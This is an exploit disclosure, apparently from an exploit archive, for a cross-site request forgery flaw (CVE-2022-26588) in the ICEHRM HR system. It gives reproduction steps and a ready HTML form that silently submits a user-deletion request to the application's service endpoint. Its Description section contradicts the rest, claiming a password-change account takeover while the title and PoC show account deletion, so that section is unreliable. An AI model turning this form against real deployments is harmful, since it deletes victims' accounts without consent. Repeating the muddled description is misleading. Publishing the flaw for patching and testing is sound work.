ICEHRM 31.0.0.0S Cross Site Request Forgery

ICEHRM version 31.0.0.0S cross site request forgery exploit that demonstrates account deletion. This finding varies from the original finding of cross site request forgery in the same software from the same researcher.


MD5 | b5bc12e7c050353eaa242ad9e2ecd581

# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
# Date: 29/03/2022
# Exploit Author: Devansh Bordia
# Vendor Homepage: https://icehrm.com/
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
# Version: 31.0.0.OS
#Tested on: Windows 10
# CVE: CVE-2022-26588

1. About - ICEHRM
IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.

2. Description:
The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.

3. Steps To Reproduce:

1.) Now login into the application and go to users.
2.) After this add an user with the name Devansh.
3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request.
4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/
5.) Now generate a csrf poc for post based requests with necessary parameters.
6.) Finally open that html poc and execute in the same browser session.
7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability.

4. Exploit POC (Exploit.html)

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="
http://localhost:8070/app/service.php">
<table>
<tr>
<td>t</td>
<td>
<input type="text" value="User" name="t">
</td>
</tr>
<tr>
<td>a</td>
<td>
<input type="text" value="delete" name="a">
</td>
</tr>
<tr>
<td>id</td>
<td>
<input type="text" value="6" name="id">
</td>
</tr>
</table>
<input type="submit" value="http://localhost:8070/app/service.php"> </form>
</html>


Related Posts